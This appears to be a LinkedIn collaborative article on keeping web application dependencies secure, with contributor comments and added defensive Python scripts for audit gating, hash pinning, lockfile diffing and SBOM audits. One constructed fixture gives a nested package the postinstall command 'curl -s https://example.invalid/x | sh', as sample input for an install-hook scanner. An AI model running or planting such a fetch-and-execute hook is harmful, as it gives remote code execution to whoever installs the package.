How do you ensure web application dependencies are secure? (2024)

Last updated on Mar 23, 2024

Powered by AI and the LinkedIn community

  1. Scan your dependencies regularly
  2. Update your dependencies frequently
  3. Use secure coding practices
  4. Monitor your dependencies continuously
  5. Remove unused or unnecessary dependencies
  6. Audit your dependencies periodically
  7. Here’s what else to consider

Web applications rely on dependencies such as libraries, frameworks and packages for functionality and performance. Those same dependencies introduce security risk when they are outdated, vulnerable or malicious, and a flaw in a dependency is exploited exactly like a flaw in your own code. How do you ensure web application dependencies are secure? Here are some best practices to follow.

Selected by the community from 11 contributions.

1 Scan your dependencies regularly

One of the first steps to secure your web application dependencies is to scan them regularly for known vulnerabilities. Tools like npm audit, Snyk or Dependabot compare the versions in your lockfile against advisory databases and alert you to matches; run them in CI on every change and on a schedule as well, because new advisories are published against versions you already ship. A scanner only knows about published vulnerabilities, so you should also review the source code, documentation, maintainer activity and reputation of a dependency before adding it to your project.

  • Farshid Sanei (AppSec | DevSecOps | Product Security | Application Security Engineer @ Snapp!):

    When scanning dependencies, it's beneficial to consider their "reachability." Often, dependencies such as those listed in a Go project's go.mod file may include unused or unreachable packages. Scanning these can be superfluous, generating unnecessary noise within a DevSecOps framework. For this purpose, CDXGEN, an open-source tool, which has usage-detection ability, can be utilized to streamline the process.

  • Aleksandr Beketov (Information Security Lead, CISSP):

    You can scan and get a list of dependencies easily if you use simple mechanisms like maven, gradle, yarn.lock, requirements.txt for Python, and others. In case you have a custom build, you may find yourself in a situation where using one mechanism will not cover all the dependencies of the whole project. In this case, you need to use different analysis tools and aggregate the result into a vulnerability management system. For example, gather JavaScript and Python dependencies with Syft, maven dependencies with cyclonedx-maven-plugin and generate a single report in Dependency Track.

  • Another contributor:

    The important thing for having visibility on all your dependencies and security weaknesses is to scan the dependencies as soon as they exist in the Software Development Life Cycle. However, the crucial metric to ensure the dependencies have repeated scanning is to measure the mean time between two scanning reports, or in short, the scan result should have an expiry. Another critical measure is the coverage between the dependencies that got scanned and the dependencies that exist in the source code, in all software repositories that we're protecting.

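The scanning step ends with a decision: does this finding block the build or not? The script below is an added example, not code from the article or from npm. It reads `npm audit --json` output, keeps only findings at or above a severity threshold, and honours a list of accepted-risk exceptions that expire, so a temporary waiver cannot silently become permanent. The audit document, the package names, the advisory ids and the URLs are constructed for the example.

```python
"""Gate a build on `npm audit --json` output, with advisory exceptions that expire.

Added example; not code from the original article. The audit document below is
constructed in the shape of `npm audit --json` (npm 7 and later) with made-up
package names; the advisory ids and URLs are not real.
"""
import json
from datetime import date

SEVERITY_RANK = {"info": 0, "low": 1, "moderate": 2, "high": 3, "critical": 4}

# Constructed sample report (not real advisories).
SAMPLE_AUDIT = json.dumps({
    "auditReportVersion": 2,
    "vulnerabilities": {
        "fast-template": {
            "name": "fast-template", "severity": "high", "range": "<2.0.0", "fixAvailable": True,
            "via": [{"source": 1001, "title": "Prototype pollution",
                     "url": "https://example.invalid/advisories/1001"}],
        },
        # transitive: its only problem is that it depends on fast-template
        "widget-kit": {"name": "widget-kit", "severity": "low", "range": "*",
                       "fixAvailable": False, "via": ["fast-template"]},
        "legacy-parser": {
            "name": "legacy-parser", "severity": "critical", "range": "<=1.4.0", "fixAvailable": False,
            "via": [{"source": 1002, "title": "ReDoS in header parsing",
                     "url": "https://example.invalid/advisories/1002"}],
        },
    },
    "metadata": {"vulnerabilities": {"info": 0, "low": 1, "moderate": 0,
                                     "high": 1, "critical": 1, "total": 3}},
})

# Accepted-risk exceptions: advisory id -> ISO expiry date. An expired exception stops suppressing.
EXCEPTIONS = {1002: "2024-06-30"}


def direct_advisories(entry):
    """`via` mixes advisory objects (direct findings) with package-name strings (transitive)."""
    return [v for v in entry.get("via", []) if isinstance(v, dict)]


def evaluate(audit_json, threshold="high", exceptions=None, today=None):
    """Return blocking and suppressed findings at or above `threshold`.

    A finding is suppressed only if every advisory behind it has an unexpired exception;
    transitive-only entries carry no advisory id of their own and are never suppressed here.
    """
    exceptions = exceptions or {}
    today = date.fromisoformat(today) if today else date.today()
    min_rank = SEVERITY_RANK[threshold]
    blocking, suppressed = [], []
    for name, entry in json.loads(audit_json).get("vulnerabilities", {}).items():
        if SEVERITY_RANK.get(entry.get("severity"), 0) < min_rank:
            continue
        ids = [adv["source"] for adv in direct_advisories(entry)]
        covered = bool(ids) and all(
            adv_id in exceptions and date.fromisoformat(exceptions[adv_id]) >= today
            for adv_id in ids
        )
        (suppressed if covered else blocking).append((name, entry["severity"], ids))
    return {"blocking": blocking, "suppressed": suppressed}


if __name__ == "__main__":
    result = evaluate(SAMPLE_AUDIT, threshold="high", exceptions=EXCEPTIONS, today="2024-06-01")
    for name, severity, ids in result["blocking"]:
        print(f"BLOCK {name} ({severity}) advisories={ids}")
    for name, severity, ids in result["suppressed"]:
        print(f"accepted until expiry: {name} ({severity}) advisories={ids}")
    raise SystemExit(1 if result["blocking"] else 0)
```

In CI the real report would be piped in (`npm audit --json | python gate.py`, with the script reading stdin instead of the constant). Transitive-only entries, whose `via` holds package names rather than advisory objects, are deliberately never suppressed: the fix belongs to the package that introduced them, and that package's own entry is where the exception should be recorded.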

2 Update your dependencies frequently

Another way to ensure web application dependencies are secure is to update them frequently to patched versions. Updates close known security holes, fix bugs and improve performance, but an update can also break your application or bring in something new (a changed default, an extra transitive dependency, or in the worst case a compromised release), so test updates in CI before deploying them and keep a lockfile so that the versions you tested are the versions that get built. Tools like npm outdated, yarn outdated or pip list --outdated show which dependencies have newer releases so you can update them deliberately.

  • Aleksandr Beketov (Information Security Lead, CISSP):

    It is good practice to store the update as an artifact in a secure perimeter from where it will be picked up by the software when it is built. It is important to run security tests and review the software's behaviour after the update to ensure that the update does not introduce new vulnerabilities or undeclared features. If no new vulnerabilities are detected, you can update and go into production.

  • Another contributor:

    This is an easy statement from a security standpoint. However, it's not an easy task for developers at all. So to uplift, you need to implement a dependency manager into your environment to help check and suggest the up-to-date version of a dependency to the developers so that they can do their best: code review and make the next steps. However, OSS dependencies are community efforts and depend a lot on their maintainers. To prevent the situation where the dependency is not maintainable, support from maintainers and contributors is needed. There is a necessary control to measure the dependencies to help with the answers: are the dependencies secure and healthy enough to use, supported by active contributors and frequent release updates?

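Storing an update as an artifact and picking it up at build time, as described above, only helps if the build verifies that the artifact is the one that was reviewed. The script below is an added example, not code from the article or from pip. It parses a requirements.txt written in pip's `--hash=` layout (including backslash continuation lines) and accepts a wheel only when its digest matches a pinned hash, refusing entries that are unpinned or pinned without a hash. The wheel bytes and the requirements text are constructed; the pinned hash is computed from those bytes.

```python
"""Verify a downloaded Python artifact against hashes pinned in requirements.txt
before it is allowed into the build.

Added example, not code from the article. The requirements text and the wheel
bytes are constructed; the pinned hash is computed from those bytes.
"""
import hashlib
import re

PIN_RE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9_.-]*)==(?P<version>\S+)")
HASH_RE = re.compile(r"--hash=(?P<algo>sha256|sha384|sha512):(?P<digest>[0-9a-fA-F]+)")

# Constructed stand-ins for a fetched wheel and a tampered copy of it.
GOOD_WHEEL = b"PK\x03\x04 constructed stand-in for requests-2.31.0-py3-none-any.whl"
TAMPERED_WHEEL = GOOD_WHEEL + b"\n# injected payload"

# Constructed requirements.txt in pip's --require-hashes layout.
REQUIREMENTS = f"""
# pinned and hashed: accepted only if the bytes match
requests==2.31.0 \\
    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()}
# pinned but no hash: must be refused
urllib3==2.2.1
"""


def parse_requirements(text):
    """Return {name: {"version": v, "hashes": {algo: set(digests)}}}, honouring '\\' continuations."""
    logical, pending = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # comments never carry pins or hashes
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        logical.append(pending + line)
        pending = ""
    if pending:
        logical.append(pending)
    pins = {}
    for line in logical:
        match = PIN_RE.match(line.strip())
        if not match:
            continue
        hashes = {}
        for h in HASH_RE.finditer(line):
            hashes.setdefault(h["algo"], set()).add(h["digest"].lower())
        pins[match["name"].lower()] = {"version": match["version"], "hashes": hashes}
    return pins


def verify_artifact(name, data, pins):
    """True only if `data` matches a pinned hash for `name`; unpinned or hash-less pins are refused."""
    pin = pins.get(name.lower())
    if not pin or not pin["hashes"]:
        return False
    return any(hashlib.new(algo, data).hexdigest() in digests
               for algo, digests in pin["hashes"].items())


if __name__ == "__main__":
    pins = parse_requirements(REQUIREMENTS)
    print("requests (good copy):", verify_artifact("requests", GOOD_WHEEL, pins))
    print("requests (tampered):", verify_artifact("requests", TAMPERED_WHEEL, pins))
    print("urllib3 (no hash):", verify_artifact("urllib3", GOOD_WHEEL, pins))
```

`pip install --require-hashes -r requirements.txt` performs the same check at install time; a stand-alone verifier like this one is useful wherever artifacts are promoted between environments without being installed. pip-tools' `pip-compile --generate-hashes` produces the layout parsed here.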

3 Use secure coding practices

A third way to ensure web application dependencies are secure is to use secure coding practices when working with them. This means applying the principle of least privilege to your dependencies: give them only the access and permissions they need, and do not let install-time lifecycle scripts you have not reviewed run with the build's rights (npm's ignore-scripts setting turns them off). It also means validating untrusted input before it reaches a dependency and encoding the output it produces, to prevent injection attacks, cross-site scripting or data leakage; a dependency's parser is part of your attack surface. Linters and formatters such as ESLint, Prettier or PyLint enforce coding standards and catch some error-prone constructs, but they are not security scanners; for vulnerability checks use a static analysis (SAST) tool such as Semgrep.

  • Aleksandr Beketov (Information Security Lead, CISSP):

    Programs like ESLint, Prettier, or PyLint belong to the linter class. That means that they check code quality rather than its safety. For safety checks, it is better to use SAST analysers. Among free ones you may try Semgrep. On Semgrep Playground there is a large choice of rules for different languages and frameworks.

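Least privilege for a dependency starts at install time: any package in the tree can declare a preinstall, install or postinstall script, and npm runs it with the installing user's rights. The script below is an added example, not code from the article or from npm. It walks a node_modules tree, including scoped and nested packages, and lists every install hook it finds so the commands can be reviewed before they are allowed to run. The tree is constructed in a temporary directory; the package names and commands are made up.

```python
"""Enumerate install-time lifecycle scripts in an npm dependency tree so they can be
reviewed before they run with the build's privileges.

Added example, not code from the article. The node_modules tree is constructed in a
temporary directory; package names and commands are made up.
"""
import json
import os
import tempfile

# Hooks npm runs automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def build_fixture():
    """Create a constructed node_modules tree and return its path."""
    root = tempfile.mkdtemp(prefix="node_modules_")
    packages = {
        "safe-lib": {"name": "safe-lib", "version": "1.0.0", "scripts": {"test": "jest"}},
        "@scope/native-addon": {"name": "@scope/native-addon", "version": "3.2.1",
                                "scripts": {"install": "node-gyp rebuild"}},
        # nested dependency of safe-lib with a network-fetching postinstall
        "safe-lib/node_modules/fetcher": {"name": "fetcher", "version": "0.9.0",
                                          "scripts": {"postinstall": "curl -s https://example.invalid/x | sh"}},
    }
    for rel, manifest in packages.items():
        pkg_dir = os.path.join(root, *rel.split("/"))
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as f:
            json.dump(manifest, f)
    return root


def find_install_scripts(node_modules):
    """Return sorted (package name, hook, command) for every package that declares an install hook."""
    findings = []
    for current, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(current, "package.json"), encoding="utf-8") as f:
                manifest = json.load(f)
        except (OSError, ValueError):
            continue  # unreadable manifest: not a package we can reason about
        scripts = manifest.get("scripts")
        if not isinstance(scripts, dict):
            continue
        name = manifest.get("name") or os.path.relpath(current, node_modules)
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append((name, hook, scripts[hook]))
    return sorted(findings)


if __name__ == "__main__":
    tree = build_fixture()
    for name, hook, command in find_install_scripts(tree):
        print(f"{name}: {hook} -> {command}")
```

Run it against a real tree with `find_install_scripts('node_modules')`. To stop the hooks running at all, install with `npm ci --ignore-scripts` (or `ignore-scripts=true` in .npmrc) and then run the build steps of the few packages that genuinely need them explicitly, which turns an implicit allow-all into an explicit allow-list.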

4 Monitor your dependencies continuously

A fourth way to ensure web application dependencies are secure is to monitor them continuously for new advisories, suspicious releases and signs of abandonment. A vulnerability tracker such as OWASP Dependency-Track ingests your SBOM and re-evaluates it as new advisories are published, so you learn about a problem in a version you already run without re-scanning by hand. Usage and activity signals from GitHub Dependents, npm trends or PyPI Stats help you spot a package whose maintenance has stalled, but popularity is not a security guarantee. Runtime monitoring with Sentry, New Relic or Datadog tells you when your application or one of its dependencies misbehaves in production; pair it with a review of what changed in a new release (a new maintainer, a new install script, a new transitive dependency, a changed download source) before you trust it.

  • Aleksandr Beketov (Information Security Lead, CISSP):

    You can use the free OWASP Dependency Track to track vulnerabilities in your dependencies. It allows you to get information about new vulnerabilities every day from NVD, GitHub and other databases.

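Continuous monitoring also means noticing what changes between two builds. The script below is an added example, not code from the article or from npm. It diffs two package-lock.json files (lockfileVersion 3 layout), reports additions, removals and upgrades, and separately flags the two cases that deserve a closer look: a package whose version is unchanged but whose integrity hash or download URL changed, and a new or upgraded package resolved from somewhere other than the expected registry. Both lockfiles, the integrity strings and the mirror host are constructed.

```python
"""Compare two package-lock.json snapshots and flag what deserves a human look:
new packages, removals, upgrades, same-version content changes, and off-registry sources.

Added example, not code from the article. Both lockfiles are constructed
(lockfileVersion 3 layout) with made-up integrity values and hosts.
"""
import json

ALLOWED_REGISTRY = "https://registry.npmjs.org/"   # assumption: the only registry we trust

OLD_LOCK = json.dumps({
    "name": "webapp", "lockfileVersion": 3, "packages": {
        "": {"name": "webapp", "version": "1.0.0"},
        "node_modules/express": {"version": "4.18.2", "integrity": "sha512-constructedExpressA==",
                                 "resolved": "https://registry.npmjs.org/express/-/express-4.18.2.tgz"},
        "node_modules/lodash": {"version": "4.17.21", "integrity": "sha512-constructedLodashA==",
                                "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"},
        "node_modules/debug": {"version": "4.3.4", "integrity": "sha512-constructedDebugA==",
                               "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz"},
    },
})

NEW_LOCK = json.dumps({
    "name": "webapp", "lockfileVersion": 3, "packages": {
        "": {"name": "webapp", "version": "1.0.1"},
        "node_modules/express": {"version": "4.19.2", "integrity": "sha512-constructedExpressB==",
                                 "resolved": "https://registry.npmjs.org/express/-/express-4.19.2.tgz"},
        # same version as before, but the tarball hash changed
        "node_modules/lodash": {"version": "4.17.21", "integrity": "sha512-constructedLodashZ==",
                                "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"},
        # brand-new package pulled from a host that is not our registry
        "node_modules/helper-utils": {"version": "1.0.0", "integrity": "sha512-constructedHelperA==",
                                      "resolved": "https://mirror.example.invalid/helper-utils-1.0.0.tgz"},
    },
})


def installed_packages(lock_json):
    """Map install path -> (version, integrity, resolved) from the 'packages' table, minus the root entry."""
    packages = json.loads(lock_json).get("packages", {})
    return {path: (meta.get("version"), meta.get("integrity"), meta.get("resolved"))
            for path, meta in packages.items() if path != ""}


def diff_locks(old_json, new_json):
    old, new = installed_packages(old_json), installed_packages(new_json)
    report = {"added": sorted(set(new) - set(old)), "removed": sorted(set(old) - set(new)),
              "upgraded": [], "suspicious": [], "off_registry": []}
    for path in sorted(set(old) & set(new)):
        (ov, oi, ores), (nv, ni, nres) = old[path], new[path]
        if ov != nv:
            report["upgraded"].append((path, ov, nv))
        elif (oi, ores) != (ni, nres):
            # Same version, different bytes or source: republished tarball, mirror swap, or tampering.
            report["suspicious"].append((path, ov, oi, ni))
    # Anything newly fetched must come from the registry we expect.
    for path in report["added"] + [p for p, _, _ in report["upgraded"]]:
        resolved = new[path][2] or ""
        if not resolved.startswith(ALLOWED_REGISTRY):
            report["off_registry"].append((path, resolved))
    return report


if __name__ == "__main__":
    for key, rows in diff_locks(OLD_LOCK, NEW_LOCK).items():
        print(f"{key}: {rows}")
```

Wire it into the pull-request check that touches the lockfile: additions and upgrades are normal and just need the usual review, but a non-empty `suspicious` or `off_registry` list is a stop-and-ask signal rather than a merge-and-move-on one.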

5 Remove unused or unnecessary dependencies

A fifth way to ensure web application dependencies are secure is to remove any unused or unnecessary dependencies from your project. Every package you do not ship is one whose vulnerabilities, install scripts and maintainers you never have to worry about, so this reduces the attack surface, the complexity and the maintenance burden of your web application, and it also avoids conflicts, compatibility issues and duplicated functionality among your dependencies. Tools like depcheck for npm projects, webpack-bundle-analyzer for what actually ends up in a bundle, or pipdeptree for seeing which Python packages are only pulled in transitively help you find candidates, which you then remove and re-test.

  • Another contributor:

    A lot of unused and unnecessary dependencies can cause noise in dependency vulnerability assessment and cost a lot of effort to remediate. The easiest way to help reduce this is always to remove them, as we don't need them. There are a few tools to help scan the source code to identify the dependencies that are imported but not in use, so they can be removed.

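The script below is an added example, not code from the article or from depcheck. It reads a project's package.json, scans the source tree for require and import statements (skipping node_modules and build output), and reports dependencies that are declared but never imported as well as packages that are imported without being declared, which usually means they are reaching your code only through a transitive dependency. The project files are constructed in a temporary directory.

```python
"""Find npm dependencies that are declared in package.json but never imported, and
packages that are imported without being declared.

Added example, not code from the article. The project is constructed in a temporary
directory with made-up source files.
"""
import json
import os
import re
import tempfile

SOURCE_EXT = (".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx")
SKIP_DIRS = {"node_modules", ".git", "dist", "build"}
# Matches require('x'), import x from 'x', import 'x', and import('x').
IMPORT_RE = re.compile(r"""(?:\brequire\s*\(\s*|\bfrom\s+|\bimport\s+|\bimport\s*\(\s*)['"]([^'"]+)['"]""")


def package_of(specifier):
    """Map an import specifier to its package name; None for relative paths and Node built-ins."""
    if specifier.startswith((".", "/", "node:")):
        return None
    parts = specifier.split("/")
    return "/".join(parts[:2]) if specifier.startswith("@") else parts[0]


def build_fixture():
    """Create a constructed project and return its path."""
    root = tempfile.mkdtemp(prefix="webapp_")
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as f:
        json.dump({"name": "webapp",
                   "dependencies": {"express": "^4.19.2", "lodash": "^4.17.21",
                                    "moment": "^2.30.1", "@aws-sdk/client-s3": "^3.0.0"},
                   "devDependencies": {"jest": "^29.0.0"}}, f)
    os.makedirs(os.path.join(root, "src"))
    with open(os.path.join(root, "src", "app.js"), "w", encoding="utf-8") as f:
        f.write("const express = require('express');\n"
                "import get from 'lodash/get';\n"
                "const s3 = import('@aws-sdk/client-s3');\n"
                "const util = require('./util');\n"
                "const fs = require('node:fs');\n"
                "const pad = require('left-pad');  // used but never declared\n")
    os.makedirs(os.path.join(root, "node_modules", "moment"))
    with open(os.path.join(root, "node_modules", "moment", "index.js"), "w", encoding="utf-8") as f:
        f.write("require('moment');")  # must be ignored: it lives under node_modules
    return root


def audit_dependencies(project_dir):
    """Return declared-but-unused runtime dependencies and used-but-undeclared packages."""
    with open(os.path.join(project_dir, "package.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    declared = set(manifest.get("dependencies", {}))
    dev = set(manifest.get("devDependencies", {}))
    used = set()
    for current, dirs, files in os.walk(project_dir):
        dirs[:] = [d for d in dirs if d not in SKIP_DIRS]
        for filename in files:
            if filename.endswith(SOURCE_EXT):
                with open(os.path.join(current, filename), encoding="utf-8") as f:
                    used.update(p for p in map(package_of, IMPORT_RE.findall(f.read())) if p)
    return {"unused": sorted(declared - used), "undeclared": sorted(used - declared - dev)}


if __name__ == "__main__":
    print(audit_dependencies(build_fixture()))
```

Call `audit_dependencies('.')` in a real project. Anything loaded by name at run time (plugins resolved from configuration, Babel or ESLint presets, framework conventions) will show up as unused, so treat the list as candidates to remove and re-test, not as an automatic delete. The `undeclared` list is the more urgent one: those packages can vanish or change with any transitive update you never asked for.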

6 Audit your dependencies periodically

A sixth way to ensure web application dependencies are secure is to audit them periodically for licensing, compliance and quality issues. Tools like FOSSA, License Finder or Black Duck report the license of each dependency and flag violations, legal risks or conflicts with your policy. SonarQube, Code Climate or Codacy analyse the quality of your own code, including how it uses its dependencies; the health of a dependency itself is better judged from its release cadence, open issues and how quickly its maintainers respond to reports. You should also review your dependency management strategy and policies regularly (allowed registries, pinning, the approval process for new packages, and how long a finding may stay open) and update them as needed.

  • Aleksandr Beketov (Information Security Lead, CISSP):

    You can use the free OWASP Dependency Track to get information about dependency licence terms. It is good practice to store the update as an artifact in a secure perimeter from where it will be picked up by the software when it is built. It is important to run security tests and review the behaviour of the software after the update to ensure that the update does not introduce new vulnerabilities or undeclared features.

  • Another contributor:

    Set up a measured approach and metrics to ensure we can effectively audit the dependencies periodically: How much time does it take for your dependencies to be scanned against the latest vulnerability database? Is there a mechanism to ensure 100% of the dependencies within the code are inventoried and scanned? What is the mean time between two scan results?

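The script below is an added example, not code from the article or from any of the tools named in this section. It turns a periodic audit into a check with measurable outcomes: it reads a CycloneDX SBOM, flags components whose license is on a deny list or missing, marks SPDX expressions for manual review, and then compares the SBOM against the last vulnerability scan to report scan coverage (the share of inventoried components the scan actually evaluated) and whether the scan is older than its expiry, which are the two metrics the contributions above ask for. The SBOM, the scan summary and its layout, the deny list and the seven-day expiry are all constructed assumptions.

```python
"""Audit a CycloneDX SBOM against a license policy and check that the last vulnerability
scan is both complete (covers every component) and fresh (not past its expiry).

Added example, not code from the article. The SBOM and the scan summary are constructed;
component names, versions, timestamps, the deny list and the expiry are assumptions.
"""
import json
from datetime import datetime, timedelta

DENIED_LICENSES = {"GPL-3.0-only", "AGPL-3.0-only"}   # policy for a proprietary web app (assumption)
SCAN_MAX_AGE = timedelta(days=7)                      # a scan result older than this has expired (assumption)

SBOM = json.dumps({
    "bomFormat": "CycloneDX", "specVersion": "1.5",
    "components": [
        {"type": "library", "name": "express", "version": "4.19.2", "purl": "pkg:npm/express@4.19.2",
         "licenses": [{"license": {"id": "MIT"}}]},
        {"type": "library", "name": "chart-engine", "version": "2.0.0", "purl": "pkg:npm/chart-engine@2.0.0",
         "licenses": [{"license": {"id": "AGPL-3.0-only"}}]},
        {"type": "library", "name": "dual-lib", "version": "1.1.0", "purl": "pkg:npm/dual-lib@1.1.0",
         "licenses": [{"expression": "MIT OR Apache-2.0"}]},
        {"type": "library", "name": "mystery-pkg", "version": "0.1.0", "purl": "pkg:npm/mystery-pkg@0.1.0"},
    ],
})

# Constructed scan summary: when it ran and which purls it evaluated.
# This layout is the example's own, not a standard report format.
SCAN = json.dumps({
    "scanned_at": "2024-03-20T10:00:00+00:00",
    "results": {"pkg:npm/express@4.19.2": [], "pkg:npm/chart-engine@2.0.0": [], "pkg:npm/dual-lib@1.1.0": []},
})


def license_ids(component):
    """Collect SPDX ids, names or expressions declared on a CycloneDX component."""
    ids = set()
    for entry in component.get("licenses", []):
        if "license" in entry:
            ids.add(entry["license"].get("id") or entry["license"].get("name", "UNKNOWN"))
        elif "expression" in entry:
            ids.add(entry["expression"])
    return ids


def audit(sbom_json, scan_json, now):
    """Return license findings plus scan coverage and freshness, with `now` as an ISO timestamp."""
    components = json.loads(sbom_json).get("components", [])
    scan = json.loads(scan_json)
    violations, no_license, needs_review = [], [], []
    for c in components:
        ids = license_ids(c)
        if not ids:
            no_license.append(c["purl"])
            continue
        if ids & DENIED_LICENSES:
            violations.append((c["purl"], sorted(ids & DENIED_LICENSES)))
        if any(" OR " in i or " AND " in i for i in ids):
            needs_review.append(c["purl"])   # compound expression: a human picks the licence
    purls = {c["purl"] for c in components}
    scanned = set(scan.get("results", {}))
    age = datetime.fromisoformat(now) - datetime.fromisoformat(scan["scanned_at"])
    return {
        "violations": violations,
        "no_license": no_license,
        "needs_review": needs_review,
        "coverage": len(purls & scanned) / len(purls) if purls else 1.0,
        "unscanned": sorted(purls - scanned),
        "scan_age_days": age.days,
        "scan_expired": age > SCAN_MAX_AGE,
    }


if __name__ == "__main__":
    for key, value in audit(SBOM, SCAN, "2024-03-25T09:00:00+00:00").items():
        print(f"{key}: {value}")
```

Coverage below 1.0 and an expired scan are the findings to act on first: a clean scan that missed a quarter of the inventory, or one that ran two weeks ago, tells you nothing about today's exposure, whatever its vulnerability count says.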

7 Here’s what else to consider

This is a space to share examples, stories, or insights that don’t fit into any of the previous sections. What else would you like to add?

  • Another contributor:

    Dependency security management and Application Security are a team effort. And your teammates are not only security guys but also developer guys. So the key to accelerating the program is to ensure we reduce the feedback loop as much as possible and make it developer friendly, so that we can focus on mitigation actions. Try to measure everything in a data-driven approach so that we can identify where the gaps are and periodically improve the program.
